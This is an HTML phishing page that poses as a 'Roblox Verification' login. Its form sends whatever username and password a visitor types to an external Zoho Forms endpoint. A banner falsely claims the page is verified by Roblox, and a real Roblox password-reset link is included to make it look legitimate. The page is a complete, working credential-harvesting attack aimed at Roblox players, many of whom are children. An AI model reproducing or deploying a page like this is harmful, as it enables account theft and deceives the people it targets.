<!DOCTYPE html>
<html lang="en">
<head>
    <style>
        body {
            text-align: center;
            font-family: Arial, Helvetica, sans-serif;
        }
        input, select {
  width: 700px;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #ccc;
  border-radius: 4px;
  box-sizing: border-box;
}

button {
  width: 500px;
  background-color: #f2f2f2;
  color: black;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  border-radius: 4px;
  cursor: pointer;
}



div {
  border-radius: 5px;
  background-color: #f2f2f2;
  padding: 20px;
  width: 800px;
  margin-left: 530px;
}
    </style>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Roblox Verification</title>
</head>
<body>
    <h1>Login to ROBLOX</h1>
    <div>
    <!-- Change or deletion of the name attributes in the input tag will lead to empty values on record submission-->
<form action='https://forms.zohopublic.com/suggiedoge/form/Account/formperma/fMohNBQO7bZxcocDGbXDk5nz-u5XFJTsGSjf_bEjIE0/htmlRecords/submit' name='form' id='form' method='POST' accept-charset='UTF-8' enctype='multipart/form-data'>
    <input type="hidden" name="zf_referrer_name" value=""><!-- To Track referrals , place the referrer name within the " " in the above hidden input field -->
    <input type="hidden" name="zf_redirect_url" value=""><!-- To redirect to a specific page after record submission , place the respective url within the " " in the above hidden input field -->
    <input type="hidden" name="zc_gad" value=""><!-- If GCLID is enabled in Zoho CRM Integration, click details of AdWords Ads will be pushed to Zoho CRM -->
    <h2>Account</h2>
    <p></p>
    <!--Single Line-->
    <label>Username 
    <em>*</em>
    </label>
    <input  type="text" name="SingleLine" value="" fieldType=1 maxlength="255" /><br><br><br>
    <!--Single Line-->
    <label>Password 
    <em>*</em>
    </label>
    <input  type="password" name="SingleLine1" value="" fieldType=1 maxlength="255" /><br><br><br>
    <button type="submit"><em>Login</em></button></form><br><br><br>
    <a href="https://www.roblox.com/login/forgot-password-or-username">Forgot username or password?</a>
    </div>
    <br><h2>THIS IS VERIFIED BY ROBLOX! It is a secure login from ROBLOXAPI! They will have access to your username and avatar!</h2>
</body>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js" integrity="sha512-bLT0Qm9VnAYZDflyKcBaQ2gg0hSYNQrJ8RilYldYQ1FxQYoCLtUjuuRuZo+fjqhx/qtq/1itJ0C2ejDxltZVFg==" crossorigin="anonymous"></script>
</html>
